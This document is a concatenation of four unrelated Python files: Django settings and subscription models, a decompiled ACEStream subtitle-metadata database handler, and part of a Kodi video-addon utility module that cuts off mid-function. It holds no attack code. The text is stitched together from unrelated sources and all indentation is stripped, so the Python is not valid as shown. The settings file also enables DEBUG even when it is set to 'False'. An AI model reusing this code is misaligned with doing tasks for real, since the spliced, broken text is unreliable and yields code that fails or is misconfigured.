# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("SECRET_KEY", "")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = bool(os.environ.get("DEBUG", "True"))
ALLOWED_HOSTS = [os.environ.get("ALLOWED_HOSTS", ""), 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'imager_images',
'imager_profile',
'imagersite',
'sorl.thumbnail',
'taggit',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'imagersite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'imagersite.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get("NAME"),
'USER': os.environ.get("USERNAME"),
'PASSWORD': os.environ.get("DB_PASSWORD"),
'HOST': os.environ.get("HOST"),
'PORT': '5432',
'TEST': {
'NAME': 'django_imager_test'
}
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'MEDIA')
MEDIA_URL = "/media/"
LOGIN_REDIRECT_URL = '/'
ACCOUNT_ACTIVATION_DAYS = 7
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = '[email protected]'
EMAIL_HOST_PASSWORD = os.environ.get('EM_PASS', '')
SERVER_EMAIL = '[email protected]'
DEFAULT_FROM_EMAIL = "Imager Site"
|
from dateutil.relativedelta import relativedelta
from django.conf import settings
from django.db import models
from django.utils import timezone
from enum import Enum
from karrot.base.base_models import BaseModel
class ChannelSubscriptionQuerySet(models.QuerySet):
def old(self):
return self.filter(lastseen_at__lt=timezone.now() - relativedelta(minutes=5))
def recent(self):
return self.filter(lastseen_at__gt=timezone.now() - relativedelta(seconds=20))
class ChannelSubscription(BaseModel):
"""A subscription to receive messages over a django channel."""
objects = ChannelSubscriptionQuerySet.as_manager()
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
reply_channel = models.TextField() # django channels channel
lastseen_at = models.DateTimeField(default=timezone.now, null=True)
away_at = models.DateTimeField(null=True)
class PushSubscriptionPlatform(Enum):
ANDROID = 'android'
WEB = 'web'
class PushSubscription(BaseModel):
"""A subscription to receive messages over an FCM push channel."""
class Meta:
unique_together = ('user', 'token')
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
token = models.TextField() # FCM device registration token
platform = models.CharField(
default=PushSubscriptionPlatform.ANDROID.value,
choices=[(platform.value, platform.value) for platform in PushSubscriptionPlatform],
max_length=100,
)
|
#Embedded file name: ACEStream\Core\CacheDB\MetadataDBHandler.pyo
from ACEStream.Core.Subtitles.MetadataDomainObjects.SubtitleInfo import SubtitleInfo
from ACEStream.Core.Subtitles.MetadataDomainObjects.MetadataDTO import MetadataDTO
from ACEStream.Core.CacheDB.SqliteCacheDBHandler import BasicDBHandler
import threading
from ACEStream.Core.CacheDB.sqlitecachedb import SQLiteCacheDB
import sys
from ACEStream.Core.Subtitles.MetadataDomainObjects.MetadataExceptions import SignatureException, MetadataDBException
from ACEStream.Core.Utilities.utilities import bin2str, str2bin
import sqlite3
import time
SUBTITLE_LANGUAGE_CODE = 'lang'
SUBTITLE_PATH = 'path'
METADATA_TABLE = 'Metadata'
MD_ID_KEY = 'metadata_id'
MD_PUBLISHER_KEY = 'publisher_id'
MD_INFOHASH_KEY = 'infohash'
MD_DESCRIPTION_KEY = 'description'
MD_TIMESTAMP_KEY = 'timestamp'
MD_SIGNATURE_KEY = 'signature'
SUBTITLES_TABLE = 'Subtitles'
SUB_MD_FK_KEY = 'metadata_id_fk'
SUB_LANG_KEY = 'subtitle_lang'
SUB_LOCATION_KEY = 'subtitle_location'
SUB_CHECKSUM_KEY = 'checksum'
SUBTITLES_HAVE_TABLE = 'SubtitlesHave'
SH_MD_FK_KEY = 'metadata_id_fk'
SH_PEER_ID_KEY = 'peer_id'
SH_HAVE_MASK_KEY = 'have_mask'
SH_TIMESTAMP = 'received_ts'
SH_RESULTS_LIMIT = 200
DEBUG = False
SELECT_SUBS_JOIN_BASE = 'SELECT sub.' + SUB_MD_FK_KEY + ', sub.' + SUB_LANG_KEY + ', sub.' + SUB_LOCATION_KEY + ', sub.' + SUB_CHECKSUM_KEY + ' FROM ' + METADATA_TABLE + ' AS md ' + 'INNER JOIN ' + SUBTITLES_TABLE + ' AS sub ' + 'ON md.' + MD_ID_KEY + ' = sub.' + SUB_MD_FK_KEY
MD_SH_JOIN_CLAUSE = METADATA_TABLE + ' AS md ' + 'INNER JOIN ' + SUBTITLES_HAVE_TABLE + ' AS sh ' + 'ON md.' + MD_ID_KEY + ' = sh.' + SH_MD_FK_KEY
QUERIES = {'SELECT SUBS JOIN HASH ALL': SELECT_SUBS_JOIN_BASE + ' WHERE md.' + MD_INFOHASH_KEY + ' = ?' + ' AND md.' + MD_PUBLISHER_KEY + ' = ?;',
'SELECT SUBS JOIN HASH ONE': SELECT_SUBS_JOIN_BASE + ' WHERE md.' + MD_INFOHASH_KEY + ' = ?' + ' AND md.' + MD_PUBLISHER_KEY + ' = ?' + ' AND sub.' + SUB_LANG_KEY + ' = ?;',
'SELECT SUBS FK ALL': 'SELECT * FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + ' = ?;',
'SELECT SUBS FK ONE': 'SELECT * FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + ' = ?' + ' AND ' + SUB_LANG_KEY + ' = ?;',
'SELECT METADATA': 'SELECT * FROM ' + METADATA_TABLE + ' WHERE ' + MD_INFOHASH_KEY + ' = ?' + ' AND ' + MD_PUBLISHER_KEY + ' = ?;',
'SELECT NRMETADATA': 'SELECT COUNT(*) FROM ' + METADATA_TABLE + ' WHERE ' + MD_PUBLISHER_KEY + ' = ?;',
'SELECT PUBLISHERS FROM INFOHASH': 'SELECT ' + MD_PUBLISHER_KEY + ' FROM ' + METADATA_TABLE + ' WHERE ' + MD_INFOHASH_KEY + ' = ?;',
'UPDATE METADATA': 'UPDATE ' + METADATA_TABLE + ' SET ' + MD_DESCRIPTION_KEY + ' = ?, ' + MD_TIMESTAMP_KEY + ' = ?, ' + MD_SIGNATURE_KEY + ' = ?' + ' WHERE ' + MD_INFOHASH_KEY + ' = ?' + ' AND ' + MD_PUBLISHER_KEY + ' = ?;',
'UPDATE SUBTITLES': 'UPDATE ' + SUBTITLES_TABLE + ' SET ' + SUB_LOCATION_KEY + '= ?, ' + SUB_CHECKSUM_KEY + '= ?' + ' WHERE ' + SUB_MD_FK_KEY + '= ?' + ' AND ' + SUB_LANG_KEY + '= ?;',
'DELETE ONE SUBTITLES': 'DELETE FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + '= ? ' + ' AND ' + SUB_LANG_KEY + '= ?;',
'DELETE ONE SUBTITLE JOIN': 'DELETE FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + ' IN ( SELECT ' + MD_ID_KEY + ' FROM ' + METADATA_TABLE + ' WHERE ' + MD_PUBLISHER_KEY + ' = ?' + ' AND ' + MD_INFOHASH_KEY + ' = ? )' + ' AND ' + SUB_LANG_KEY + '= ?;',
'DELETE ALL SUBTITLES': 'DELETE FROM ' + SUBTITLES_TABLE + ' WHERE ' + SUB_MD_FK_KEY + '= ?;',
'DELETE METADATA PK': 'DELETE FROM ' + METADATA_TABLE + ' WHERE ' + MD_ID_KEY + ' = ?;',
'INSERT METADATA': 'INSERT or IGNORE INTO ' + METADATA_TABLE + ' VALUES ' + '(NULL,?,?,?,?,?)',
'INSERT SUBTITLES': 'INSERT INTO ' + SUBTITLES_TABLE + ' VALUES (?, ?, ?, ?);',
'SELECT SUBTITLES WITH PATH': 'SELECT sub.' + SUB_MD_FK_KEY + ', sub.' + SUB_LOCATION_KEY + ', sub.' + SUB_LANG_KEY + ', sub.' + SUB_CHECKSUM_KEY + ', m.' + MD_PUBLISHER_KEY + ', m.' + MD_INFOHASH_KEY + ' FROM ' + METADATA_TABLE + ' AS m ' + 'INNER JOIN ' + SUBTITLES_TABLE + ' AS sub ' + 'ON m.' + MD_ID_KEY + ' = ' + ' sub.' + SUB_MD_FK_KEY + ' WHERE ' + SUB_LOCATION_KEY + ' IS NOT NULL;',
'SELECT SUBTITLES WITH PATH BY CHN INFO': 'SELECT sub.' + SUB_LOCATION_KEY + ', sub.' + SUB_LANG_KEY + ', sub.' + SUB_CHECKSUM_KEY + ' FROM ' + METADATA_TABLE + ' AS m ' + 'INNER JOIN ' + SUBTITLES_TABLE + ' AS sub ' + 'ON m.' + MD_ID_KEY + ' = ' + ' sub.' + SUB_MD_FK_KEY + ' WHERE sub.' + SUB_LOCATION_KEY + ' IS NOT NULL' + ' AND m.' + MD_PUBLISHER_KEY + ' = ?' + ' AND m.' + MD_INFOHASH_KEY + ' = ?;',
'INSERT HAVE MASK': 'INSERT INTO ' + SUBTITLES_HAVE_TABLE + ' VALUES ' + '(?, ?, ?, ?);',
'GET ALL HAVE MASK': 'SELECT sh.' + SH_PEER_ID_KEY + ', sh.' + SH_HAVE_MASK_KEY + ', sh.' + SH_TIMESTAMP + ' FROM ' + MD_SH_JOIN_CLAUSE + ' WHERE md.' + MD_PUBLISHER_KEY + ' = ? AND md.' + MD_INFOHASH_KEY + ' = ? ' + 'ORDER BY sh.' + SH_TIMESTAMP + ' DESC' + ' LIMIT ' + str(SH_RESULTS_LIMIT) + ';',
'GET ONE HAVE MASK': 'SELECT sh.' + SH_HAVE_MASK_KEY + ', sh.' + SH_TIMESTAMP + ' FROM ' + MD_SH_JOIN_CLAUSE + ' WHERE md.' + MD_PUBLISHER_KEY + ' = ? AND md.' + MD_INFOHASH_KEY + ' = ? AND sh.' + SH_PEER_ID_KEY + ' = ?;',
'UPDATE HAVE MASK': 'UPDATE ' + SUBTITLES_HAVE_TABLE + ' SET ' + SH_HAVE_MASK_KEY + ' = ?, ' + SH_TIMESTAMP + ' = ?' + ' WHERE ' + SH_PEER_ID_KEY + ' = ?' + ' AND ' + SH_MD_FK_KEY + ' IN ' + '( SELECT + ' + MD_ID_KEY + ' FROM ' + METADATA_TABLE + ' WHERE + ' + MD_PUBLISHER_KEY + ' = ?' + ' AND ' + MD_INFOHASH_KEY + ' = ? );',
'DELETE HAVE': 'DELETE FROM ' + SUBTITLES_HAVE_TABLE + ' WHERE ' + SH_PEER_ID_KEY + ' = ?' + ' AND ' + SH_MD_FK_KEY + ' IN ' + '( SELECT + ' + MD_ID_KEY + ' FROM ' + METADATA_TABLE + ' WHERE + ' + MD_PUBLISHER_KEY + ' = ?' + ' AND ' + MD_INFOHASH_KEY + ' = ? );',
'CLEANUP OLD HAVE': 'DELETE FROM ' + SUBTITLES_HAVE_TABLE + ' WHERE ' + SH_TIMESTAMP + ' < ? ' + ' AND ' + SH_PEER_ID_KEY + ' NOT IN ' + '( SELECT md.' + MD_PUBLISHER_KEY + ' FROM ' + METADATA_TABLE + ' AS md WHERE md.' + MD_ID_KEY + ' = ' + SH_MD_FK_KEY + ' );'}
class MetadataDBHandler(object, BasicDBHandler):
__single = None
_lock = threading.RLock()
@staticmethod
def getInstance(*args, **kw):
if MetadataDBHandler.__single is None:
MetadataDBHandler._lock.acquire()
try:
if MetadataDBHandler.__single is None:
MetadataDBHandler(*args, **kw)
finally:
MetadataDBHandler._lock.release()
return MetadataDBHandler.__single
def __init__(self, db = SQLiteCacheDB.getInstance()):
try:
MetadataDBHandler._lock.acquire()
MetadataDBHandler.__single = self
finally:
MetadataDBHandler._lock.release()
try:
self._db = db
print >> sys.stderr, 'Metadata: DB made'
except:
print >> sys.stderr, "Metadata: couldn't make the tables"
print >> sys.stderr, 'Metadata DB Handler initialized'
def commit(self):
self._db.commit()
def getAllSubtitles(self, channel, infohash):
query = QUERIES['SELECT SUBS JOIN HASH ALL']
infohash = bin2str(infohash)
channel = bin2str(channel)
results = self._db.fetchall(query, (infohash, channel))
subsDict = {}
for entry in results:
subsDict[entry[1]] = SubtitleInfo(entry[1], entry[2], entry[3])
return subsDict
def _deleteSubtitleByChannel(self, channel, infohash, lang):
query = QUERIES['DELETE ONE SUBTITLE JOIN']
infohash = bin2str(infohash)
channel = bin2str(channel)
self._db.execute_write(query, (channel, infohash, lang))
def _getAllSubtitlesByKey(self, metadataKey):
query = QUERIES['SELECT SUBS FK ALL']
results = self._db.fetchall(query, (metadataKey,))
subsDict = {}
for entry in results:
subsDict[entry[1]] = SubtitleInfo(entry[1], entry[2], str2bin(entry[3]))
return subsDict
def getSubtitle(self, channel, infohash, lang):
query = QUERIES['SELECT SUBS JOIN HASH ONE']
infohash = bin2str(infohash)
channel = bin2str(channel)
res = self._db.fetchall(query, (infohash, channel, lang))
if len(res) == 0:
return None
if len(res) == 1:
checksum = str2bin(res[0][3])
return SubtitleInfo(res[0][1], res[0][2], checksum)
raise MetadataDBException('Metadata DB Constraint violeted!')
def _getSubtitleByKey(self, metadata_fk, lang):
query = QUERIES['SELECT SUBS FK ONE']
res = self._db.fetchall(query, (metadata_fk, lang))
if len(res) == 0:
return None
if len(res) == 1:
checksum = str2bin(res[0][3])
return SubtitleInfo(res[0][1], res[0][2], checksum)
raise MetadataDBException('Metadata DB Constraint violeted!')
def getMetadata(self, channel, infohash):
query = QUERIES['SELECT METADATA']
infohash = bin2str(infohash)
channel = bin2str(channel)
res = self._db.fetchall(query, (infohash, channel))
if len(res) == 0:
return
if len(res) > 1:
raise MetadataDBException('Metadata DB Constraint violated')
metaTuple = res[0]
subsDictionary = self._getAllSubtitlesByKey(metaTuple[0])
publisher = str2bin(metaTuple[1])
infohash = str2bin(metaTuple[2])
timestamp = int(metaTuple[4])
description = unicode(metaTuple[3])
signature = str2bin(metaTuple[5])
toReturn = MetadataDTO(publisher, infohash, timestamp, description, None, signature)
for sub in subsDictionary.itervalues():
toReturn.addSubtitle(sub)
return toReturn
def getNrMetadata(self, channel):
query = QUERIES['SELECT NRMETADATA']
channel = bin2str(channel)
return self._db.fetchone(query, (channel,))
def getAllMetadataForInfohash(self, infohash):
strinfohash = bin2str(infohash)
query = QUERIES['SELECT PUBLISHERS FROM INFOHASH']
channels = self._db.fetchall(query, (strinfohash,))
return [ self.getMetadata(str2bin(entry[0]), infohash) for entry in channels ]
def hasMetadata(self, channel, infohash):
query = QUERIES['SELECT METADATA']
infohash = bin2str(infohash)
channel = bin2str(channel)
res = self._db.fetchall(query, (infohash, channel))
return len(res) != 0
def insertMetadata(self, metadata_dto):
if not metadata_dto.verifySignature():
raise SignatureException('Metadata to insert is not properlysigned')
select_query = QUERIES['SELECT METADATA']
signature = bin2str(metadata_dto.signature)
infohash = bin2str(metadata_dto.infohash)
channel = bin2str(metadata_dto.channel)
res = self._db.fetchall(select_query, (infohash, channel))
isUpdate = False
if len(res) != 0:
if metadata_dto.timestamp > res[0][4]:
query = QUERIES['UPDATE METADATA']
self._db.execute_write(query, (metadata_dto.description,
metadata_dto.timestamp,
signature,
infohash,
channel), False)
fk_key = res[0][0]
isUpdate = True
else:
return
else:
query = QUERIES['INSERT METADATA']
self._db.execute_write(query, (channel,
infohash,
metadata_dto.description,
metadata_dto.timestamp,
signature), True)
if DEBUG:
print >> sys.stderr, 'Performing query on db: ' + query
newRows = self._db.fetchall(select_query, (infohash, channel))
if len(newRows) == 0:
raise IOError('No results, while there should be one')
fk_key = newRows[0][0]
self._insertOrUpdateSubtitles(fk_key, metadata_dto.getAllSubtitles(), False)
self._db.commit()
return isUpdate
def _insertOrUpdateSubtitles(self, fk_key, subtitles, commitNow = True):
allSubtitles = self._getAllSubtitlesByKey(fk_key)
oldSubsSet = frozenset(allSubtitles.keys())
newSubsSet = frozenset(subtitles.keys())
commonLangs = oldSubsSet & newSubsSet
newLangs = newSubsSet - oldSubsSet
toDelete = oldSubsSet - newSubsSet
for lang in commonLangs:
self._updateSubtitle(fk_key, subtitles[lang], False)
for lang in toDelete:
self._deleteSubtitle(fk_key, lang, False)
for lang in newLangs:
self._insertNewSubtitle(fk_key, subtitles[lang], False)
if commitNow:
self._db.commit()
def _updateSubtitle(self, metadata_fk, subtitle, commitNow = True):
toUpdate = self._getSubtitleByKey(metadata_fk, subtitle.lang)
if toUpdate is None:
return
query = QUERIES['UPDATE SUBTITLES']
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (subtitle.path,
checksum,
metadata_fk,
subtitle.lang), commitNow)
def updateSubtitlePath(self, channel, infohash, lang, newPath, commitNow = True):
query = QUERIES['SELECT SUBS JOIN HASH ONE']
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (infohash, channel, lang))
if len(res) > 1:
raise MetadataDBException('Metadata DB constraint violated')
else:
if len(res) == 0:
if DEBUG:
print >> sys.stderr, 'Nothing to update for channel %s, infohash %s, lang %s. Doing nothing.' % (channel[-10:], infohash, lang)
return False
query = QUERIES['UPDATE SUBTITLES']
self._db.execute_write(query, (newPath,
res[0][3],
res[0][0],
lang), commitNow)
return True
def _deleteSubtitle(self, metadata_fk, lang, commitNow = True):
query = QUERIES['DELETE ONE SUBTITLES']
self._db.execute_write(query, (metadata_fk, lang), commitNow)
def _insertNewSubtitle(self, metadata_fk, subtitle, commitNow = True):
query = QUERIES['INSERT SUBTITLES']
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (metadata_fk,
subtitle.lang,
subtitle.path,
checksum), commitNow)
def deleteMetadata(self, channel, infohash):
channel = bin2str(channel)
infohash = bin2str(infohash)
query = QUERIES['SELECT METADATA']
if DEBUG:
print >> sys.stderr, 'Performing query on db: ' + query
res = self._db.fetchall(query, (infohash, channel))
if len(res) == 0:
return
if len(res) > 1:
raise IOError('Metadata DB constraint violated')
metadata_fk = res[0][0]
self._deleteAllSubtitles(metadata_fk, False)
query = QUERIES['DELETE METADATA PK']
self._db.execute_write(query, (metadata_fk,), False)
self._db.commit()
def _deleteAllSubtitles(self, metadata_fk, commitNow):
query = QUERIES['DELETE ALL SUBTITLES']
self._db.execute_write(query, (metadata_fk,), commitNow)
def getAllLocalSubtitles(self):
query = QUERIES['SELECT SUBTITLES WITH PATH']
res = self._db.fetchall(query)
result = {}
for entry in res:
path = entry[1]
lang = entry[2]
checksum = str2bin(entry[3])
channel = str2bin(entry[4])
infohash = str2bin(entry[5])
s = SubtitleInfo(lang, path, checksum)
if channel not in result:
result[channel] = {}
if infohash not in result[channel]:
result[channel][infohash] = []
result[channel][infohash].append(s)
return result
def getLocalSubtitles(self, channel, infohash):
query = QUERIES['SELECT SUBTITLES WITH PATH BY CHN INFO']
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (channel, infohash))
result = {}
for entry in res:
location = entry[0]
language = entry[1]
checksum = str2bin(entry[2])
subInfo = SubtitleInfo(language, location, checksum)
result[language] = subInfo
return result
def insertHaveMask(self, channel, infohash, peer_id, havemask, timestamp = None):
query = QUERIES['SELECT METADATA']
if timestamp is None:
timestamp = int(time.time())
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
res = self._db.fetchall(query, (infohash, channel))
if len(res) != 1:
raise MetadataDBException('No entry in the MetadataDB for %s, %s' % (channel[-10:], infohash))
metadata_fk = res[0][0]
insertQuery = QUERIES['INSERT HAVE MASK']
try:
self._db.execute_write(insertQuery, (metadata_fk,
peer_id,
havemask,
timestamp))
except sqlite3.IntegrityError as e:
raise MetadataDBException(str(e))
def updateHaveMask(self, channel, infohash, peer_id, newMask, timestamp = None):
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
updateQuery = QUERIES['UPDATE HAVE MASK']
if timestamp is None:
timestamp = int(time.time())
self._db.execute_write(updateQuery, (newMask,
timestamp,
peer_id,
channel,
infohash))
def deleteHaveEntry(self, channel, infohash, peer_id):
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
deleteQuery = QUERIES['DELETE HAVE']
self._db.execute_write(deleteQuery, (peer_id, channel, infohash))
def getHaveMask(self, channel, infohash, peer_id):
query = QUERIES['GET ONE HAVE MASK']
channel = bin2str(channel)
infohash = bin2str(infohash)
peer_id = bin2str(peer_id)
res = self._db.fetchall(query, (channel, infohash, peer_id))
if len(res) <= 0:
return None
if len(res) > 1:
raise AssertionError('channel,infohash,peer_id should be unique')
else:
return res[0][0]
def getHaveEntries(self, channel, infohash):
query = QUERIES['GET ALL HAVE MASK']
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (channel, infohash))
returnlist = list()
for entry in res:
peer_id = str2bin(entry[0])
haveMask = entry[1]
timestamp = entry[2]
returnlist.append((peer_id, haveMask, timestamp))
return returnlist
def cleanupOldHave(self, limit_ts):
cleanupQuery = QUERIES['CLEANUP OLD HAVE']
self._db.execute_write(cleanupQuery, (limit_ts,))
def insertOrUpdateHave(self, channel, infohash, peer_id, havemask, timestamp = None):
if timestamp is None:
timestamp = int(time.time())
if self.getHaveMask(channel, infohash, peer_id) is not None:
self.updateHaveMask(channel, infohash, peer_id, havemask, timestamp)
else:
self.insertHaveMask(channel, infohash, peer_id, havemask, timestamp)
|
import urllib,re,string,sys,os
import xbmc, xbmcgui, xbmcaddon, xbmcplugin
import time,threading
#Mash Up - by Mash2k3 2012.
addon_id = 'plugin.video.movie25'
selfAddon = xbmcaddon.Addon(id=addon_id)
mashpath = selfAddon.getAddonInfo('path')
grab = None
fav = False
hostlist = None
Dir = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.movie25', ''))
repopath = xbmc.translatePath(os.path.join('special://home/addons/repository.mash2k3', ''))
datapath = xbmc.translatePath(selfAddon.getAddonInfo('profile'))
supportsite = 'mashupxbmc.com'
hosts = 'putlocker,sockshare,billionuploads,hugefiles,mightyupload,movreel,lemuploads,180upload,megarelease,filenuke,flashx,gorillavid,bayfiles,veehd,vidto,mailru,videomega,epicshare,bayfiles,2gbhosting,alldebrid,allmyvideos,vidspot,castamp,cheesestream,clicktoview,crunchyroll,cyberlocker,daclips,dailymotion,divxstage,donevideo,ecostream,entroupload,facebook,filebox,hostingbulk,hostingcup,jumbofiles,limevideo,movdivx,movpod,movshare,movzap,muchshare,nolimitvideo,nosvideo,novamov,nowvideo,ovfile,play44_net,played,playwire,premiumize_me,primeshare,promptfile,purevid,rapidvideo,realdebrid,rpnet,seeon,sharefiles,sharerepo,sharesix,skyload,stagevu,stream2k,streamcloud,thefile,tubeplus,tunepk,ufliq,upbulk,uploadc,uploadcrazynet,veoh,vidbull,vidcrazynet,video44,videobb,videofun,videotanker,videoweed,videozed,videozer,vidhog,vidpe,vidplay,vidstream,vidup,vidx,vidxden,vidzur,vimeo,vureel,watchfreeinhd,xvidstage,yourupload,youtube,youwatch,zalaa,zooupload,zshare'
if selfAddon.getSetting('visitor_ga')=='':
from random import randint
selfAddon.setSetting('visitor_ga',str(randint(0, 0x7fffffff)))
VERSION = str(selfAddon.getAddonInfo('version'))
#PATH = "MashUp-DEV"
PATH = "MashUp-"
UATRACK="UA-38312513-1"
try:
log_path = xbmc.translatePath('special://logpath')
log = os.path.join(log_path, 'xbmc.log')
logfile = open(log, 'r').read()
match=re.compile('Starting XBMC \((.+?) Git:.+?Platform: (.+?)\. Built').search(logfile)
if not match:
match=re.compile('Starting XBMC \((.+?) Git:.+?Platform: (.+?bit)').search(logfile)
if match:
build = match.group(1)
PLATFORM = match.group(2)
print 'XBMC '+build+' Platform '+PLATFORM
else:
PLATFORM=''
except:
PLATFORM=''
sys.path.append( os.path.join( selfAddon.getAddonInfo('path'), 'resources', 'libs' ))
################################################################################ Common Calls ##########################################################################################################
if selfAddon.getSetting("skin") == "0":
art = 'https://raw.github.com/mash2k3/MashupArtwork/master/skins/vector'
fanartimage=Dir+'fanart2.jpg'
else:
art = 'https://raw.github.com/mash2k3/MashupArtwork/master/skins/greenmonster'
fanartimage=Dir+'fanart.jpg'
elogo = xbmc.translatePath('special://home/addons/plugin.video.movie25/resources/art/bigx.png')
slogo = xbmc.translatePath('special://home/addons/plugin.video.movie25/resources/art/smallicon.png')
def OPENURL(url, mobile = False, q = False, verbose = True, timeout = 10, cookie = None, data = None, cookiejar = False, log = True, headers = [], type = '',ua = False):
import urllib2
UserAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36'
if ua: UserAgent = ua
try:
if log:
print "MU-Openurl = " + url
if cookie and not cookiejar:
import cookielib
cookie_file = os.path.join(os.path.join(datapath,'Cookies'), cookie+'.cookies')
cj = cookielib.LWPCookieJar()
if os.path.exists(cookie_file):
try: cj.load(cookie_file,True)
except: cj.save(cookie_file,True)
else: cj.save(cookie_file,True)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
elif cookiejar:
import cookielib
cj = cookielib.LWPCookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
else:
opener = urllib2.build_opener()
if mobile:
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')]
else:
opener.addheaders = [('User-Agent', UserAgent)]
for header in headers:
opener.addheaders.append(header)
if data:
if type == 'json':
import json
data = json.dumps(data)
opener.addheaders.append(('Content-Type', 'application/json'))
else: data = urllib.urlencode(data)
response = opener.open(url, data, timeout)
else:
response = opener.open(url, timeout=timeout)
if cookie and not cookiejar:
cj.save(cookie_file,True)
link=response.read()
response.close()
opener.close()
#link = net(UserAgent).http_GET(url).content
link=link.replace(''',"'").replace('"','"').replace('&',"&").replace("'","'").replace('<i>','').replace("#8211;","-").replace('</i>','').replace("’","'").replace('&quot;','"').replace('×','x').replace('&','&').replace('‘','').replace('–','').replace('“','').replace('”','').replace('—','')
link=link.replace('%3A',':').replace('%2F','/')
if q: q.put(link)
return link
except Exception as e:
if verbose:
xbmc.executebuiltin("XBMC.Notification(Sorry!,Source Website is Down,3000,"+elogo+")")
xbmc.log('***********Website Error: '+str(e)+'**************', xbmc.LOGERROR)
import traceback
traceback.print_exc()
link ='website down'
if q: q.put(link)
return link
def batchOPENURL(urls, mobile = False, merge = True):
try:
import Queue as queue
except ImportError:
import queue
max = len(urls)
results = []
for url in urls:
q = queue.Queue()
threading.Thread(target=OPENURL, args=(url,mobile,q)).start()
results.append(q)
if merge: content = ''
else: content = []
for n in range(max):
if merge: content += results[n].get()
else: content.append(results[n].get())
return content
def OPENURL2(url):
from t0mm0.common.net import Net as net
UserAgent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
try:
print "MU-Openurl = " + url
link = net(UserAgent).http_GET(url).content
return link.encode('utf-8', 'ignore')
except:
xbmc.executebuiltin("XBMC.Notification(Sorry!,Source Website is Down,3000,"+elogo+")")
link ='website down'
return link
def REDIRECT(url):
import urllib2
req = urllib2.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')
response = urllib2.urlopen(req)
link=response.geturl()
return link
def Clearhistory(path):
if os.path.exists(path):
os.remove(path)
def setGrab():
global grab
if grab is None:
from metahandler import metahandlers
grab = metahandlers.MetaData()
def getFav():
global fav
if not fav:
from resources.universal import favorites
fav = favorites.Favorites(addon_id, sys.argv)
return fav
def getRDHosts():
CachePath = os.path.join(datapath,'Cache')
CachedRDHosts = xbmc.translatePath(os.path.join(CachePath, 'rdhosts'))
rdhosts = getFile(CachedRDHosts)
if not rdhosts or os.stat(CachedRDHosts).st_mtime + 86400 < time.time():
rdhosts = OPENURL('http://real-debrid.com/api/hosters.php').replace('"', '')
setFile(CachedRDHosts,rdhosts,True)
return rdhosts
def getHostList():
global hostlist
if not hostlist:
hostlist = hosts
try:
if xbmcaddon.Addon(id='script.module.urlresolver').getSetting("RealDebridResolver_enabled") == 'true': hostlist += getRDHosts()
except: pass
return hostlist
def unescapes(text):
try:
